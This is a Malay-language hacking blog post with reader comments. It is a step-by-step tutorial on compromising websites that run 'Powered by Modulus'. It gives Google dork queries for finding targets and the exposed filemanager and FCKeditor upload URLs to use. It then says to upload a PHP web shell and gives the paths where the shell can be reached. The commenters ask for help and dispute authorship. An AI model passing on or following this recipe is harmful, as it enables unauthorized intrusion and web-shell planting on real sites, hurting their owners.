Tuesday, 7 August 2012

Powered by Modulus - Shell Upload Vulnerability

Assalamualaikum dan salam sejahtera.Hari ni aku nak ajar exploit yang boleh upload shell.Ok jom mula...

1. Mula2 google dork :

  • “Powered by Modulus” 
  • inurl:filemanager/libraries/
2. Seterusnya pilih salah satu web.

Exploit :
http://localhost/modules/filemanager/libraries/filemanager/filemanager.php
or
http://localhost/modules/fckeditor/libraries/fckeditor/editor/filemanager/connectors/uploadtest.html

3. Paparan dia lebih kurang macam ni :


Next click butang UPLOAD.Rujuk gambar :


Kemudian akan keluar macam ni :


Click Choose File dan UPLOAD!
Allowed File : php, html, asp, php4, txt, jpg, and more

4. Untuk tengok hasil :

http://localhost/modules/core/home/2/shell.php
or 
http://localhost/home/2/shell.php

5.DONE!

Live demo :  
Item Reviewed: Powered by Modulus - Shell Upload Vulnerability Description: Rating: 5 Reviewed By Unknown

Share:

7 comments:

  1. Error while saving *****.php :/

    ReplyDelete
  2. This site is running TeamViewer.

    Free Port 80 for other applications in advanced settings.

    kenapa jadi macam nie.. kurang paham la..mintak tunjuk ajar lagi.=)

    ReplyDelete
  3. Ini artikel saya yang buat, tak de ikak cantumkan nama awak di sini -_-

    ReplyDelete
  4. Ini saya ambil dari binus hacker.tetapi saya tulis lain.

    ReplyDelete

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com